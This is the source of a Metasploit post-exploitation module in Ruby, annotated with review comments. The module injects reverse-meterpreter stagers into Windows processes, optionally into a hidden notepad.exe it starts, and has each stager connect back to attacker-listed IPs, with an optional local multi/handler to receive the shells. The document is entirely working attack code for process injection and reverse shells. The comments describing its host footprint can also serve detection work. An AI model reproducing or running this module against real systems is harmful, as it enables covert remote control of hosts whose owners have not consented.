##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module: generates one reverse-meterpreter stager per entry in IPLIST and
# writes it into a target process (an existing PID from PIDLIST, or a freshly
# started hidden PROCESSNAME when no PID is given), repeating AMOUNT times.
#
# Observable footprint on the host, straight from the calls below: a handle
# opened with PROCESS_ALL_ACCESS on the target PID, a remote memory allocation
# and write, a remote thread creation, an optional hidden child process
# (default notepad.exe), and one outbound connection per stager to
# LHOST:LPORT. The stdapi commands under 'Compat' map one-to-one onto those
# calls in #inject and #start_proc.
class MetasploitModule < Msf::Post

  # Declares metadata and options. Runtime behaviour is driven entirely by
  # the datastore keys registered here (PAYLOAD, LPORT, IPLIST, PIDLIST,
  # HANDLER, AMOUNT, and the advanced PROCESSNAME).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Inject in Memory Multiple Payloads',
        'Description' => %q{
          This module will inject into several processes a given
          payload and connect to a given list of IP addresses.
          The module works with a given lists of IP addresses and
          process IDs if no PID is given it will start the given
          process in the advanced options and inject the selected
          payload into the memory of the created module.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Carlos Perez <carlos_perez[at]darkoperator.com>',
          'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' # added multiple payload support
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => ['meterpreter'],
        'Compat' => {
          'Meterpreter' => {
            # Each command here is exercised by exactly one call in
            # #inject (attach/allocate/write/thread_create) or
            # #start_proc (execute).
            'Commands' => %w[
              stdapi_sys_process_attach
              stdapi_sys_process_execute
              stdapi_sys_process_memory_allocate
              stdapi_sys_process_memory_write
              stdapi_sys_process_thread_create
            ]
          }
        },
        'Notes' => {
          # Writing into and starting a thread in an arbitrary PID can take
          # that process down; hence the stability flag.
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('PAYLOAD', [false, 'Payload to inject in to process memory', 'windows/meterpreter/reverse_tcp']),
        OptInt.new('LPORT', [false, 'Port number for the payload LPORT variable.', 4444]),
        # IPLIST is the only required option; it is split on ';' in #run.
        OptString.new('IPLIST', [true, 'List of semicolon separated IP list.', Rex::Socket.source_address('1.2.3.4')]),
        # Empty default: split(';') then yields [], so every IP gets a new process.
        OptString.new('PIDLIST', [false, 'List of semicolon separated PID list.', '']),
        OptBool.new('HANDLER', [false, 'Start new exploit/multi/handler job on local box.', false]),
        # The whole IP/PID walk is repeated this many times (see #run).
        OptInt.new('AMOUNT', [false, 'Select the amount of shells you want to spawn.', 1])
      ]
    )

    register_advanced_options(
      [
        # NOTE(review): the option description is the placeholder text
        # 'Description'; it should say this is the image started (hidden)
        # when no PID is supplied for an IP.
        OptString.new('PROCESSNAME', [false, 'Description', 'notepad.exe'])
      ]
    )
  end

  # Entry point. Refuses non-Windows or non-x86/x64 sessions, optionally
  # starts a local multi/handler, then for each (IP, PID) pair builds a
  # stager and injects it, pausing 5 seconds between injections.
  #
  # @return [nil] on an unsupported session; otherwise the value of the
  #   outer AMOUNT loop (not used by the framework).
  def run
    unless session.platform == 'windows' && [ARCH_X64, ARCH_X86].include?(session.arch)
      print_error('This module requires native Windows meterpreter functions not compatible with the selected session')
      return
    end

    # Prefer the cached sysinfo; fall back to running `hostname` on the target.
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
    print_status("Running module against #{hostname} (#{session.session_host})")

    # Set variables
    # NOTE(review): both nil assignments are dead; the values are overwritten
    # unconditionally below.
    multi_ip = nil
    multi_pid = nil

    # Handler is started before any stager is sent so the first callback
    # has something to land on; it is skipped entirely unless HANDLER is set.
    if datastore['HANDLER']
      create_multi_handler(datastore['PAYLOAD'], datastore['LPORT'])
    end

    multi_ip = datastore['IPLIST'].split(';')
    multi_pid = datastore['PIDLIST'].split(';')

    # Every round re-walks the same pairs: with PIDLIST set, each listed PID is
    # injected again on every round; without it, each round starts a new
    # PROCESSNAME process per IP.
    datastore['AMOUNT'].times do # iterate through number of shells
      # zip is driven by multi_ip: missing PIDs become nil, extra PIDs are
      # ignored.
      multi_ip.zip(multi_pid).each do |a|
        # Check if we have an IP for the session
        payload = create_payload(datastore['PAYLOAD'], a[0], datastore['LPORT'])
        if a[1]
          inject(a[1], payload)
        else
          # if no PID we create a process to host the Meterpreter session
          pid_num = start_proc(datastore['PROCESSNAME'])
          inject(pid_num, payload)
        end
        # 5 second pause between injections (select with no fds is a sleep).
        # #inject never raises, so a failed injection does not stop the loop.
        select(nil, nil, nil, 5)
      end
    end
  end

  # Function for injecting payload in to a given PID
  #-------------------------------------------------------------------------------
  # Opens target_pid with PROCESS_ALL_ACCESS, allocates memory in it, writes
  # the generated stager bytes and starts a thread at that address.
  #
  # @param target_pid [String, Integer] PID as given in PIDLIST (a String,
  #   converted with to_i) or returned by #start_proc
  # @param payload_to_inject [Object] payload instance from #create_payload;
  #   only its #generate is used
  # @return [nil] when any step raises; the error is printed, not re-raised,
  #   and the caller does not inspect the return value
  def inject(target_pid, payload_to_inject)
    print_status("Injecting meterpreter into process ID #{target_pid}")

    host_process = session.sys.process.open(target_pid.to_i, PROCESS_ALL_ACCESS)
    raw = payload_to_inject.generate
    # Adds raw.length % 1024 bytes of slack. NOTE(review): this is not a
    # round-up to the next 1024-byte boundary, just extra room.
    mem = host_process.memory.allocate(raw.length + (raw.length % 1024))

    print_status("Allocated memory at address #{'0x%.8x' % mem}, for #{raw.length} byte stager")
    print_status('Writing the stager into memory...')
    host_process.memory.write(mem, raw)
    host_process.thread.create(mem, 0)
    print_good("Successfully injected Meterpreter into process: #{target_pid}")
  rescue StandardError => e
    # Best-effort: report and move on so the remaining (IP, PID) pairs in
    # #run are still processed.
    print_error("Failed to inject payload into #{target_pid}!")
    print_error(e.message)
  end

  # Function for Creation of Connection Handler
  #-------------------------------------------------------------------------------
  # Starts exploit/multi/handler as a background job on the local framework.
  #
  # @param payload_to_inject [String] payload reference name (PAYLOAD option)
  # @param rport [Integer] listening port (LPORT option)
  # @param rhost [String] listening address; defaults to all interfaces
  # @return [Object] whatever print_good returns (unused by the caller)
  def create_multi_handler(payload_to_inject, rport, rhost = '0.0.0.0')
    print_status("Starting connection handler at port #{rport} for #{payload_to_inject}")
    mul = client.framework.exploits.create('multi/handler')
    mul.datastore['WORKSPACE'] = session.workspace
    mul.datastore['PAYLOAD'] = payload_to_inject
    mul.datastore['LHOST'] = rhost
    mul.datastore['LPORT'] = rport
    mul.datastore['EXITFUNC'] = 'process'
    # Keep listening after the first session: several stagers call back.
    mul.datastore['ExitOnSession'] = false

    mul.exploit_simple(
      'Payload' => mul.datastore['PAYLOAD'],
      'RunAsJob' => true
    )
    print_good('exploit/multi/handler started!')
  end

  # Function for Creating the Payload
  #-------------------------------------------------------------------------------
  # Instantiates payload_type from the framework and points it at lhost:lport.
  #
  # @param payload_type [String] payload reference name (PAYLOAD option)
  # @param lhost [String] one entry from IPLIST
  # @param lport [Integer] LPORT option
  # @return [Object] the configured payload instance
  def create_payload(payload_type, lhost, lport)
    print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}")
    # NOTE(review): `payload` is a plain alias of payload_type.
    payload = payload_type
    pay = client.framework.payloads.create(payload)
    pay.datastore['LHOST'] = lhost
    pay.datastore['LPORT'] = lport
    return pay
  end

  # Function starting notepad.exe process
  #-------------------------------------------------------------------------------
  # Starts proc_name hidden on the target and returns its PID.
  #
  # @param proc_name [String] PROCESSNAME advanced option (default notepad.exe)
  # @return [Integer] PID of the new process
  def start_proc(proc_name)
    # NOTE(review): the message always says Notepad.exe even when PROCESSNAME
    # has been changed.
    print_good('Starting Notepad.exe to house Meterpreter Session.')
    # NOTE(review): local `proc` shadows Kernel#proc inside this method.
    proc = client.sys.process.execute(proc_name, nil, { 'Hidden' => true })
    print_good("Process created with pid #{proc.pid}")
    return proc.pid
  end
end